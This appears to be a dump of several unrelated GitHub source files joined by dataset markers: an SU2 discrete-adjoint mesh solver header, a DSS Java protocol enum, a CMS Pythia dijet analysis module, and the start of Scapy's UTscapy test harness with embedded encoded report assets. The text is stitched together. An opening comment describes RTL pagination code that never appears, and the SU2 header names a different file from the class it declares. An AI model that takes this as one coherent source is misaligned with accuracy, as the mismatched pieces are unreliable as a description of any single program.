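// Behaviour sketch (illustrative): when ConfigContext supplies rtlEnabled, the
// visual "next" button navigates backwards (getNextDirection() returns 'prev'),
// so the class names and click handlers swap automatically. pageIndexChange(n)
// ignores out-of-range values: with pageCount = 5 and hasKnownLastPage = true,
// only 0 <= n <= 4 is applied.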
| {
"pile_set_name": "Github"
} |
/*!
* \file CMeshSolver.hpp
* \brief Declaration and inlines of the class to compute the
* the discrete adjoint of the linear-elastic mesh solver.
* \author Ruben Sanchez
* \version 7.0.6 "Blackbird"
*
* SU2 Project Website: https://su2code.github.io
*
* The SU2 Project is maintained by the SU2 Foundation
* (http://su2foundation.org)
*
* Copyright 2012-2020, SU2 Contributors (cf. AUTHORS.md)
*
* SU2 is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* SU2 is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with SU2. If not, see <http://www.gnu.org/licenses/>.
*/
#pragma once
#include "CSolver.hpp"
#include "../variables/CDiscAdjMeshBoundVariable.hpp"
/*!
* \class CDiscAdjMeshSolver
* \brief Main class for defining the discrete adjoint solver for mesh deformation problems.
* \ingroup Discrete_Adjoint
* \author R. Sanchez
*/
class CDiscAdjMeshSolver final : public CSolver {
private:
unsigned short KindDirect_Solver;
CSolver *direct_solver;
CDiscAdjMeshBoundVariable* nodes = nullptr; /*!< \brief Variables of the discrete adjoint mesh solver. */
/*!
* \brief Return nodes to allow CSolver::base_nodes to be set.
*/
inline CVariable* GetBaseClassPointerToNodes() override { return nodes; }
public:
/*!
* \brief Constructor of the class.
*/
CDiscAdjMeshSolver(void);
/*!
* \overload
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] config - Definition of the particular problem.
* \param[in] iMesh - Index of the mesh in multigrid computations.
*/
CDiscAdjMeshSolver(CGeometry *geometry, CConfig *config);
/*!
* \overload
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] config - Definition of the particular problem.
* \param[in] solver - Initialize the discrete adjoint solver with the corresponding direct solver.
* \param[in] Kind_Solver - The kind of direct solver.
*/
CDiscAdjMeshSolver(CGeometry *geometry, CConfig *config, CSolver* solver);
/*!
* \brief Destructor of the class.
*/
~CDiscAdjMeshSolver(void) override;
/*!
* \brief Performs the preprocessing of the AD-based mesh adjoint solver.
* Registers all necessary variables on the tape. Called while tape is active.
* \param[in] geometry_container - The geometry container holding all grid levels.
* \param[in] config_container - The particular config.
*/
void RegisterSolution(CGeometry *geometry, CConfig *config) override;
/*!
* \brief Sets the adjoint values of the input variables of the flow (+turb.) iteration
* after tape has been evaluated.
* \param[in] geometry - The geometrical definition of the problem.
* \param[in] config - The particular config.
*/
void ExtractAdjoint_Solution(CGeometry *geometry, CConfig *config) override;
/*!
* \brief Extract and set the geometrical sensitivity.
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] solver - The solver container holding all terms of the solution.
* \param[in] config - Definition of the particular problem.
*/
void SetSensitivity(CGeometry *geometry, CSolver **solver, CConfig *config) override;
/*!
* \brief Prepare the solver for a new recording.
* \param[in] kind_recording - Kind of AD recording.
*/
void SetRecording(CGeometry *geometry, CConfig *config) override;
/*!
* \brief A virtual member.
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] config - Definition of the particular problem.
* \param[in] reset - If true reset variables to their initial values.
*/
void RegisterVariables(CGeometry *geometry,
CConfig *config,
bool reset = false) override;
/*!
* \brief A virtual member.
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] config - Definition of the particular problem.
*/
void ExtractAdjoint_Variables(CGeometry *geometry, CConfig *config) override;
/*!
* \brief Update the dual-time derivatives.
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] solver_container - Container vector with all the solutions.
* \param[in] config - Definition of the particular problem.
* \param[in] iMesh - Index of the mesh in multigrid computations.
* \param[in] iRKStep - Current step of the Runge-Kutta iteration.
* \param[in] RunTime_EqSystem - System of equations which is going to be solved.
* \param[in] Output - boolean to determine whether to print output.
*/
void Preprocessing(CGeometry *geometry,
CSolver **solver_container,
CConfig *config,
unsigned short iMesh,
unsigned short iRKStep,
unsigned short RunTime_EqSystem,
bool Output) override;
/*!
* \brief Load a solution from a restart file.
* \param[in] geometry - Geometrical definition of the problem.
* \param[in] solver - Container vector with all of the solvers.
* \param[in] config - Definition of the particular problem.
* \param[in] val_iter - Current external iteration number.
* \param[in] val_update_geo - Flag for updating coords and grid velocity.
*/
void LoadRestart(CGeometry **geometry,
CSolver ***solver,
CConfig *config,
int val_iter,
bool val_update_geo) override;
};
| {
"pile_set_name": "Github"
} |
/**
* DSS - Digital Signature Services
* Copyright (C) 2015 European Commission, provided under the CEF programme
*
* This file is part of the "DSS - Digital Signature Services" project.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
package eu.europa.esig.dss.spi.client.http;
/**
* This enum lists all network protocols that can be used during the signature creation or validation: OCSP, CRL, AIA, TSL...
*
*/
public enum Protocol {
FILE("file"), HTTP("http"), HTTPS("https"), LDAP("ldap"), FTP("ftp");
private final String name;
Protocol(final String name) {
this.name = name;
}
/**
* @return the name of the protocol
*/
public String getName() {
return name;
}
/**
* Indicates if the given string represents HTTPS protocol.
*
* @param name {@code String} to be checked
* @return true or false
*/
public static boolean isHttps(final String name) {
return HTTPS.name.equalsIgnoreCase(name);
}
/**
* Indicates if the given string represents HTTP protocol.
*
* @param name {@code String} to be checked
* @return true or false
*/
public static boolean isHttp(final String name) {
return HTTP.name.equalsIgnoreCase(name);
}
/**
* Indicates if the given URL uses FILE protocol
*
* @param urlString to be checked
* @return true or false
*/
public static boolean isFileUrl(final String urlString) {
return urlString !=null && urlString.startsWith(FILE.name);
}
/**
* Indicates if the given URL uses HTTP protocol
*
* @param urlString to be checked
* @return true or false
*/
public static boolean isHttpUrl(final String urlString) {
return urlString !=null && urlString.startsWith(HTTP.name);
}
/**
* Indicates if the given URL uses FTP protocol
*
* @param urlString to be checked
* @return true or false
*/
public static boolean isFtpUrl(final String urlString) {
return urlString !=null && urlString.startsWith(FTP.name);
}
/**
* Indicates if the given URL uses LDAP protocol
*
* @param urlString to be checked
* @return true or false
*/
public static boolean isLdapUrl(final String urlString) {
return urlString !=null && urlString.startsWith(LDAP.name);
}
/**
* Indicates if the given URL uses the current protocol
*
* @param urlString to be checked
* @return true or false
*/
public boolean isTheSame(final String urlString) {
return urlString != null && urlString.startsWith(name);
}
/**
* This method try to retrieve the protocol indicated by the given URL string.
*
* @param urlString to be analysed
* @return found {@code Protocol} or {@code null}
*/
public static Protocol getFrom(final String urlString) {
if (HTTP.isTheSame(urlString)) {
return HTTP;
} else if (HTTPS.isTheSame(urlString)) {
return HTTPS;
} else if (LDAP.isTheSame(urlString)) {
return LDAP;
} else if (FTP.isTheSame(urlString)) {
return FTP;
} else if (FILE.isTheSame(urlString)) {
return FILE;
}
return null;
}
}
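// Usage sketch (plain static calls; the URLs are illustrative):
//   Protocol.getFrom("https://ec.europa.eu/tl")        -> Protocol.HTTPS
//   Protocol.isLdapUrl("ldap://x500.example.org/cn=x") -> true
//   Protocol.getFrom("mailto:user@example.org")        -> null (no matching scheme)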
| {
"pile_set_name": "Github"
} |
// Name: JetAnaPythia
// Description: Example of analysis of Pythia produced partons & jets
// Based on Kostas Kousouris' templated JetPlotsExample.
// Plots are tailored to needs of dijet mass and ratio analysis.
// Author: R. Harris
// Date: 28 - Oct - 2008
#include "RecoJets/JetAnalyzers/interface/JetAnaPythia.h"
#include "DataFormats/JetReco/interface/CaloJetCollection.h"
#include "DataFormats/JetReco/interface/PFJetCollection.h"
#include "DataFormats/JetReco/interface/GenJetCollection.h"
#include "DataFormats/JetReco/interface/CaloJet.h"
#include "DataFormats/JetReco/interface/PFJet.h"
#include "DataFormats/JetReco/interface/GenJet.h"
#include "DataFormats/HepMCCandidate/interface/GenParticle.h"
#include "SimDataFormats/GeneratorProducts/interface/GenRunInfoProduct.h"
#include "SimDataFormats/GeneratorProducts/interface/HepMCProduct.h"
#include "FWCore/Framework/interface/Event.h"
#include "FWCore/Framework/interface/Run.h"
#include "FWCore/ParameterSet/interface/ParameterSet.h"
#include <TFile.h>
#include <cmath>
using namespace edm;
using namespace reco;
using namespace std;
////////////////////////////////////////////////////////////////////////////////////////
template <class Jet>
JetAnaPythia<Jet>::JetAnaPythia(edm::ParameterSet const& cfg) {
JetAlgorithm = cfg.getParameter<std::string>("JetAlgorithm");
HistoFileName = cfg.getParameter<std::string>("HistoFileName");
NJets = cfg.getParameter<int>("NJets");
debug = cfg.getParameter<bool>("debug");
eventsGen = cfg.getParameter<int>("eventsGen");
anaLevel = cfg.getParameter<std::string>("anaLevel");
xsecGen = cfg.getParameter<vector<double> >("xsecGen");
ptHatEdges = cfg.getParameter<vector<double> >("ptHatEdges");
}
////////////////////////////////////////////////////////////////////////////////////////
template <class Jet>
void JetAnaPythia<Jet>::beginJob() {
TString hname;
m_file = new TFile(HistoFileName.c_str(), "RECREATE");
/////////// Booking histograms //////////////////////////
const int nMassBins = 103;
double massBoundaries[nMassBins + 1] = {
1, 3, 6, 10, 16, 23, 31, 40, 50, 61, 74, 88, 103, 119, 137,
156, 176, 197, 220, 244, 270, 296, 325, 354, 386, 419, 453, 489, 526, 565,
606, 649, 693, 740, 788, 838, 890, 944, 1000, 1058, 1118, 1181, 1246, 1313, 1383,
1455, 1530, 1607, 1687, 1770, 1856, 1945, 2037, 2132, 2231, 2332, 2438, 2546, 2659, 2775,
2895, 3019, 3147, 3279, 3416, 3558, 3704, 3854, 4010, 4171, 4337, 4509, 4686, 4869, 5058,
5253, 5455, 5663, 5877, 6099, 6328, 6564, 6808, 7060, 7320, 7589, 7866, 8152, 8447, 8752,
9067, 9391, 9726, 10072, 10430, 10798, 11179, 11571, 11977, 12395, 12827, 13272, 13732, 14000};
hname = "JetPt";
m_HistNames1D[hname] = new TH1F(hname, hname, 500, 0, 5000);
hname = "JetEta";
m_HistNames1D[hname] = new TH1F(hname, hname, 120, -6, 6);
hname = "JetPhi";
m_HistNames1D[hname] = new TH1F(hname, hname, 100, -M_PI, M_PI);
hname = "NumberOfJets";
m_HistNames1D[hname] = new TH1F(hname, hname, 100, 0, 100);
hname = "DijetMass";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DijetMassWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "DijetMassIn";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DijetMassInWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "DijetMassOut";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DijetMassOutWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "ResonanceMass";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DipartonMass";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DipartonMassWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "DipartonMassIn";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DipartonMassInWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "DipartonMassOut";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
hname = "DipartonMassOutWt";
m_HistNames1D[hname] = new TH1F(hname, hname, nMassBins, massBoundaries);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "PtHat";
m_HistNames1D[hname] = new TH1F(hname, hname, 1000, 0, 5000);
hname = "PtHatWt";
m_HistNames1D[hname] = new TH1F(hname, hname, 1000, 0, 5000);
m_HistNames1D.find(hname)->second->Sumw2();
hname = "PtHatFine";
m_HistNames1D[hname] = new TH1F(hname, hname, 5000, 0, 5000);
hname = "PtHatFineWt";
m_HistNames1D[hname] = new TH1F(hname, hname, 5000, 0, 5000);
m_HistNames1D.find(hname)->second->Sumw2();
mcTruthTree_ = new TTree("mcTruthTree", "mcTruthTree");
mcTruthTree_->Branch("xsec", &xsec, "xsec/F");
mcTruthTree_->Branch("weight", &weight, "weight/F");
mcTruthTree_->Branch("pt_hat", &pt_hat, "pt_hat/F");
mcTruthTree_->Branch("nJets", &nJets, "nJets/I");
mcTruthTree_->Branch("etaJet1", &etaJet1, "etaJet1/F");
mcTruthTree_->Branch("etaJet2", &etaJet2, "etaJet2/F");
mcTruthTree_->Branch("ptJet1", &ptJet1, "ptJet1/F");
mcTruthTree_->Branch("ptJet2", &ptJet2, "ptJet2/F");
mcTruthTree_->Branch("diJetMass", &diJetMass, "diJetMass/F");
mcTruthTree_->Branch("etaPart1", &etaPart1, "etaPart1/F");
mcTruthTree_->Branch("etaPart2", &etaPart2, "etaPart2/F");
mcTruthTree_->Branch("ptPart1", &ptPart1, "ptPart1/F");
mcTruthTree_->Branch("ptPart2", &ptPart2, "ptPart2/F");
mcTruthTree_->Branch("diPartMass", &diPartMass, "diPartMass/F");
}
////////////////////////////////////////////////////////////////////////////////////////
template <class Jet>
void JetAnaPythia<Jet>::analyze(edm::Event const& evt, edm::EventSetup const& iSetup) {
int notDone = 1;
while (notDone) { //while loop to allow us to tailor the analysis level for faster running.
TString hname;
// Process Info
//edm::Handle< double > genEventScale;
//evt.getByLabel("genEventScale", genEventScale );
//pt_hat = *genEventScale;
edm::Handle<edm::HepMCProduct> MCevt;
evt.getByLabel("generatorSmeared", MCevt);
HepMC::GenEvent* myGenEvent = new HepMC::GenEvent(*(MCevt->GetEvent()));
double pthat = myGenEvent->event_scale();
pt_hat = float(pthat);
delete myGenEvent;
if (anaLevel != "generating") { //We are not generating events, so xsec is there
//edm::Handle< GenRunInfoProduct > genInfoProduct;
///evt.getRun().getByLabel("generator", genInfoProduct );
//xsec = (double)genInfoProduct->externalXSecLO();
xsec = 0.0;
if (ptHatEdges.size() > xsecGen.size()) {
for (unsigned int i_pthat = 0; i_pthat < xsecGen.size(); ++i_pthat) {
if (pthat >= ptHatEdges[i_pthat] && pthat < ptHatEdges[i_pthat + 1])
xsec = float(xsecGen[i_pthat]);
}
} else {
std::cout << "Number of PtHat bin edges too small. Xsec set to zero" << std::endl;
}
} else {
xsec = xsecGen[0]; //Generating events, no xsec in event, get xsec from user input
}
if (debug)
std::cout << "cross section=" << xsec << " pb" << std::endl;
weight = xsec / eventsGen;
if (debug)
std::cout << "pt_hat=" << pt_hat << std::endl;
hname = "PtHat";
FillHist1D(hname, pt_hat, 1.0);
hname = "PtHatFine";
FillHist1D(hname, pt_hat, 1.0);
hname = "PtHatWt";
FillHist1D(hname, pt_hat, weight);
hname = "PtHatFineWt";
FillHist1D(hname, pt_hat, weight);
if (anaLevel == "PtHatOnly")
break; //ptHatOnly should be very fast
// Jet Info
math::XYZTLorentzVector p4jet[2];
float etajet[2];
/////////// Get the jet collection //////////////////////
Handle<JetCollection> jets;
evt.getByLabel(JetAlgorithm, jets);
typename JetCollection::const_iterator i_jet;
int index = 0;
/////////// Count the jets in the event /////////////////
hname = "NumberOfJets";
nJets = jets->size();
FillHist1D(hname, nJets, 1.0);
// Two Leading Jet Info
for (i_jet = jets->begin(); i_jet != jets->end() && index < 2; ++i_jet) {
hname = "JetPt";
FillHist1D(hname, i_jet->pt(), 1.0);
hname = "JetEta";
FillHist1D(hname, i_jet->eta(), 1.0);
hname = "JetPhi";
FillHist1D(hname, i_jet->phi(), 1.0);
p4jet[index] = i_jet->p4();
etajet[index] = i_jet->eta();
if (debug)
std::cout << "jet " << index + 1 << ": pt=" << i_jet->pt() << ", eta=" << etajet[index] << std::endl;
index++;
}
// TTree variables //
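    // Note: p4jet/etajet are filled only for the two leading jets, and the
    // assignments below implicitly assume the event contains at least two jets.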
etaJet1 = etajet[0];
etaJet2 = etajet[1];
ptJet1 = p4jet[0].pt();
ptJet2 = p4jet[1].pt();
diJetMass = (p4jet[0] + p4jet[1]).mass();
/// Histograms for Dijet Mass Analysis ////
if (index == 2 && abs(etaJet1) < 1.3 && abs(etaJet2) < 1.3) {
hname = "DijetMass";
FillHist1D(hname, diJetMass, 1.0);
hname = "DijetMassWt";
FillHist1D(hname, diJetMass, weight);
}
/// Histograms for Dijet Ratio Analysis: Inner region ///
if (index == 2 && abs(etaJet1) < 0.7 && abs(etaJet2) < 0.7) {
hname = "DijetMassIn";
FillHist1D(hname, diJetMass, 1.0);
hname = "DijetMassInWt";
FillHist1D(hname, diJetMass, weight);
}
/// Histograms for Dijet Ratio Analysis: Outer region ////
if (index == 2 && (abs(etaJet1) > 0.7 && abs(etaJet1) < 1.3) && (abs(etaJet2) > 0.7 && abs(etaJet2) < 1.3)) {
hname = "DijetMassOut";
FillHist1D(hname, diJetMass, 1.0);
hname = "DijetMassOutWt";
FillHist1D(hname, diJetMass, weight);
}
if (anaLevel == "Jets")
break; //Jets level for samples without genParticles
// Parton Info
edm::Handle<std::vector<reco::GenParticle> > genParticlesHandle_;
evt.getByLabel("genParticles", genParticlesHandle_);
if (debug)
for (size_t i = 0; i < genParticlesHandle_->size(); ++i) {
const reco::GenParticle& p = (*genParticlesHandle_)[i];
int id = p.pdgId();
int st = p.status();
const math::XYZTLorentzVector& genP4 = p.p4();
if (i >= 2 && i <= 8)
std::cout << "particle " << i << ": id=" << id << ", status=" << st << ", mass=" << genP4.mass()
<< ", pt=" << genP4.pt() << ", eta=" << genP4.eta() << std::endl;
}
// Examine the 7th particle in pythia.
// It should be either a resonance (abs(id)>=32) or the first outgoing parton
  // for the processes we will consider: dijet resonances, QCD, or QCD + contact interactions.
const reco::GenParticle& p = (*genParticlesHandle_)[6];
int id = p.pdgId();
math::XYZTLorentzVector resonance_p, parton1_p, parton2_p;
if (abs(id) >= 32) {
/// We are looking at dijet resonances. ////
resonance_p = p.p4();
hname = "ResonanceMass";
FillHist1D(hname, resonance_p.mass(), 1.0);
const reco::GenParticle& q = (*genParticlesHandle_)[7];
parton1_p = q.p4();
const reco::GenParticle& r = (*genParticlesHandle_)[8];
parton2_p = r.p4();
if (debug)
std::cout << "Resonance mass=" << resonance_p.mass() << ", parton 1 pt=" << parton1_p.pt()
<< ", parton 2 pt=" << parton2_p.pt() << ", diparton mass=" << (parton1_p + parton2_p).mass()
<< std::endl;
} else {
/// We are looking at QCD ////
parton1_p = p.p4();
const reco::GenParticle& q = (*genParticlesHandle_)[7];
parton2_p = q.p4();
if (debug)
std::cout << "parton 1 pt=" << parton1_p.pt() << ", parton 2 pt=" << parton2_p.pt()
<< ", diparton mass=" << (parton1_p + parton2_p).mass() << std::endl;
}
etaPart1 = parton1_p.eta();
etaPart2 = parton2_p.eta();
ptPart1 = parton1_p.pt();
ptPart2 = parton2_p.pt();
diPartMass = (parton1_p + parton2_p).mass();
/// Diparton mass for dijet mass analysis ////
if (abs(etaPart1) < 1.3 && abs(etaPart2) < 1.3) {
hname = "DipartonMass";
FillHist1D(hname, diPartMass, 1.0);
hname = "DipartonMassWt";
FillHist1D(hname, diPartMass, weight);
}
/// Diparton mass for dijet ratio analysis: inner region ///
if (abs(etaPart1) < 0.7 && abs(etaPart2) < 0.7) {
hname = "DipartonMassIn";
FillHist1D(hname, diPartMass, 1.0);
hname = "DipartonMassInWt";
FillHist1D(hname, diPartMass, weight);
}
/// Diparton mass for dijet ratio analysis: outer region ///
if ((abs(etaPart1) > 0.7 && abs(etaPart1) < 1.3) && (abs(etaPart2) > 0.7 && abs(etaPart2) < 1.3)) {
hname = "DipartonMassOut";
FillHist1D(hname, diPartMass, 1.0);
hname = "DipartonMassOutWt";
FillHist1D(hname, diPartMass, weight);
}
// Fill the TTree //
mcTruthTree_->Fill();
notDone = 0; //We are done, exit the while loop
} //end of while
}
////////////////////////////////////////////////////////////////////////////////////////
template <class Jet>
void JetAnaPythia<Jet>::endJob() {
/////////// Write Histograms in output ROOT file ////////
if (m_file != nullptr) {
m_file->cd();
mcTruthTree_->Write();
for (std::map<TString, TH1*>::iterator hid = m_HistNames1D.begin(); hid != m_HistNames1D.end(); hid++)
hid->second->Write();
delete m_file;
m_file = nullptr;
}
}
////////////////////////////////////////////////////////////////////////////////////////
template <class Jet>
void JetAnaPythia<Jet>::FillHist1D(const TString& histName, const Double_t& value, const Double_t& wt) {
std::map<TString, TH1*>::iterator hid = m_HistNames1D.find(histName);
if (hid == m_HistNames1D.end())
std::cout << "%fillHist -- Could not find histogram with name: " << histName << std::endl;
else
hid->second->Fill(value, wt);
}
/////////// Register Modules ////////
#include "FWCore/Framework/interface/MakerMacros.h"
/////////// Calo Jet Instance ////////
typedef JetAnaPythia<CaloJet> CaloJetAnaPythia;
DEFINE_FWK_MODULE(CaloJetAnaPythia);
/////////// Gen Jet Instance ////////
typedef JetAnaPythia<GenJet> GenJetAnaPythia;
DEFINE_FWK_MODULE(GenJetAnaPythia);
/////////// PF Jet Instance ////////
typedef JetAnaPythia<PFJet> PFJetAnaPythia;
DEFINE_FWK_MODULE(PFJetAnaPythia);
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more information
## Copyright (C) Philippe Biondi <[email protected]>
## This program is published under a GPLv2 license
"""
Unit testing infrastructure for Scapy
"""
import sys,getopt,imp
import bz2, base64, os.path, time, traceback, zlib, sha
#### Import tool ####
def import_module(name):
name = os.path.realpath(name)
thepath = os.path.dirname(name)
name = os.path.basename(name)
if name.endswith(".py"):
name = name[:-3]
f,path,desc = imp.find_module(name,[thepath])
try:
return imp.load_module(name, f, path, desc)
finally:
if f:
f.close()
#### INTERNAL/EXTERNAL FILE EMBEDDING ####
class File:
def __init__(self, name, URL, local):
self.name = name
self.local = local
self.URL = URL
def get_local(self):
return bz2.decompress(base64.decodestring(self.local))
def get_URL(self):
        return self.URL
def write(self, dir):
if dir:
dir += "/"
open(dir+self.name,"w").write(self.get_local())
# Embed base64-encoded, bzip2-compressed versions of the js and css files
# so that generated reports still work without Internet access.
class External_Files:
UTscapy_js = File("UTscapy.js", "http://www.secdev.org/projects/UTscapy/UTscapy.js",
"""QlpoOTFBWSZTWWVijKQAAXxfgERUYOvAChIhBAC/79+qQAH8AFA0poANAMjQAAAG
ABo0NGEZNBo00BhgAaNDRhGTQaNNAYFURJinplGaKbRkJiekzSenqmpA0Gm1LFMp
RUklVQlK9WUTZYpNFI1IiEWEFT09Sfj5uO+qO6S5DQwKIxM92+Zku94wL6V/1KTK
an2c66Ug6SmVKy1ZIrgauxMVLF5xLH0lJRQuKlqLF10iatlTzqvw7S9eS3+h4lu3
GZyMgoOude3NJ1pQy8eo+X96IYZw+ynehsiPj73m0rnvQ3QXZ9BJQiZQYQ5/uNcl
2WOlC5vyQqV/BWsnr2NZYLYXQLDs/Bffk4ZfR4/SH6GfA5Xlek4xHNHqbSsRbREO
gueXo3kcYi94K6hSO3ldD2O/qJXOFqJ8o3TE2aQahxtQpCVUKQMvODHwu2YkaORY
ZC6gihEallcHDIAtRPScBACAJnUggYhLDX6DEko7nC9GvAw5OcEkiyDUbLdiGCzD
aXWMC2DuQ2Y6sGf6NcRuON7QSbhHsPc4KKmZ/xdyRThQkGVijKQ=""")
UTscapy_css = File("UTscapy.css","http://www.secdev.org/projects/UTscapy/UTscapy.css",
"""QlpoOTFBWSZTWTbBCNEAAE7fgHxwSB//+Cpj2QC//9/6UAR+63dxbNzO3ccmtGEk
pM0m1I9E/Qp6g9Q09TNQ9QDR6gMgAkiBFG9U9TEGRkGgABoABoBmpJkRAaAxD1AN
Gh6gNADQBzAATJgATCYJhDAEYAEiQkwIyJk0n6qenpqeoaMUeo9RgIxp6pX78kfx
Jx4MUhDHKEb2pJAYAelG1cybiZBBDipH8ocxNyHDAqTUxiQmIAEDE3ApIBUUECAT
7Lvlf4xA/sVK0QHkSlYtT0JmErdOjx1v5NONPYSjrIhQnbl1MbG5m+InMYmVAWJp
uklD9cNdmQv2YigxbEtgUrsY2pDDV/qMT2SHnHsViu2rrp2LA01YJIHZqjYCGIQN
sGNobFxAYHLqqMOj9TI2Y4GRpRCUGu82PnMnXUBgDSkTY4EfmygaqvUwbGMbPwyE
220Q4G+sDvw7+6in3CAOS634pcOEAdREUW+QqMjvWvECrGISo1piv3vqubTGOL1c
ssrFnnSfU4T6KSCbPs98HJ2yjWN4i8Bk5WrM/JmELLNeZ4vgMkA4JVQInNnWTUTe
gmMSlJd/b7JuRwiM5RUzXOBTa0e3spO/rsNJiylu0rCxygdRo2koXdSJzmUVjJUm
BOFIkUKq8LrE+oT9h2qUqqUQ25fGV7e7OFkpmZopqUi0WeIBzlXdYY0Zz+WUJUTC
RC+CIPFIYh1RkopswMAop6ZjuZKRqR0WNuV+rfuF5aCXPpxAm0F14tPyhf42zFMT
GJUMxxowJnoauRq4xGQk+2lYFxbQ0FiC43WZSyYLHMuo5NTJ92QLAgs4FgOyZQqQ
xpsGKMA0cIisNeiootpnlWQvkPzNGUTPg8jqkwTvqQLguZLKJudha1hqfBib1IfO
LNChcU6OqF+3wyPKg5Y5oSbSJPAMcRDANwmS2i9oZm6vsD1pLkWtFGbAkEjjCuEU
W1ev1IsF2UVmWYFtJkqLT708ApUBK/ig3rbJWSq7RGQd3sSrOKu3lyKzTBdkXK2a
BGLV5dS1XURdKxaRkMplLLQxsimBYZEAa8KQkYyI+4EagMqycRR7RgwtZFxJSu0T
1q5wS2JG82iETHplbNj8DYo9IkmKzNAiw4FxK8bRfIYvwrbshbEagL11AQJFsqeZ
WeXDoWEx2FMyyZRAB5QyCFnwYtwtWAQmmITY8aIM2SZyRnHH9Wi8+Sr2qyCscFYo
vzM985aHXOHAxQN2UQZbQkUv3D4Vc+lyvalAffv3Tyg4ks3a22kPXiyeCGweviNX
0K8TKasyOhGsVamTUAZBXfQVw1zmdS4rHDnbHgtIjX3DcCt6UIr0BHTYjdV0JbPj
r1APYgXihjQwM2M83AKIhwQQJv/F3JFOFCQNsEI0QA==""")
def get_local_dict(cls):
return dict(map(lambda (x,y): (x, y.name), filter(lambda (x,y): isinstance(y, File), cls.__dict__.items())))
get_local_dict = classmethod(get_local_dict)
def get_URL_dict(cls):
return dict(map(lambda (x,y): (x, y.URL), filter(lambda (x,y): isinstance(y, File), cls.__dict__.items())))
get_URL_dict = classmethod(get_URL_dict)
#### HELPER CLASSES FOR PARAMETRING OUTPUT FORMAT ####
class EnumClass:
def from_string(cls,x):
return cls.__dict__[x.upper()]
from_string = classmethod(from_string)
class Format(EnumClass):
TEXT = 1
ANSI = 2
HTML = 3
LATEX = 4
XUNIT = 5
#### TEST CLASSES ####
class TestClass:
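    # TestClass defines __getitem__ so that its instances behave like
    # mappings and can be fed directly to "%(field)s"-style string
    # formatting by the report generators below.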
def __getitem__(self, item):
return getattr(self, item)
def add_keywords(self, kw):
        if isinstance(kw, str):
self.keywords.append(kw)
else:
self.keywords += kw
class TestCampaign(TestClass):
def __init__(self, title):
self.title = title
self.filename = None
self.headcomments = ""
self.campaign = []
self.keywords = []
self.crc = None
self.sha = None
self.preexec = None
self.preexec_output = None
def add_testset(self, testset):
self.campaign.append(testset)
def __iter__(self):
return self.campaign.__iter__()
def all_tests(self):
for ts in self:
for t in ts:
yield t
class TestSet(TestClass):
def __init__(self, name):
self.name = name
self.set = []
self.comments = ""
self.keywords = []
self.crc = None
self.expand = 1
def add_test(self, test):
self.set.append(test)
def __iter__(self):
return self.set.__iter__()
class UnitTest(TestClass):
def __init__(self, name):
self.name = name
self.test = ""
self.comments = ""
self.result = ""
self.res = True # must be True at init to have a different truth value than None
self.output = ""
self.num = -1
self.keywords = []
self.crc = None
self.expand = 1
def __nonzero__(self):
return self.res
#### PARSE CAMPAIGN ####
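# Campaign file syntax, as recognized by the parser below (marker in column 0):
#   %  campaign title
#   +  start a new test set
#   =  start a new unit test
#   ~  keywords for the current test (or test set, or campaign)
#   *  comment attached to the current test, test set, or campaign
#   #  comment line, ignored
# Any other line is accumulated as the code of the current test.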
def parse_campaign_file(campaign_file):
test_campaign = TestCampaign("Test campaign")
test_campaign.filename= campaign_file.name
testset = None
test = None
testnb = 0
for l in campaign_file.readlines():
if l[0] == '#':
continue
if l[0] == "~":
            (test or testset or test_campaign).add_keywords(l[1:].split())
elif l[0] == "%":
test_campaign.title = l[1:].strip()
elif l[0] == "+":
testset = TestSet(l[1:].strip())
test_campaign.add_testset(testset)
test = None
elif l[0] == "=":
test = UnitTest(l[1:].strip())
test.num = testnb
testnb += 1
testset.add_test(test)
elif l[0] == "*":
if test is not None:
test.comments += l[1:]
elif testset is not None:
testset.comments += l[1:]
else:
test_campaign.headcomments += l[1:]
else:
if test is None:
if l.strip():
                    print >>sys.stderr, "Unknown content [%s]" % l.strip()
else:
test.test += l
return test_campaign
def dump_campaign(test_campaign):
print "#"*(len(test_campaign.title)+6)
print "## %(title)s ##" % test_campaign
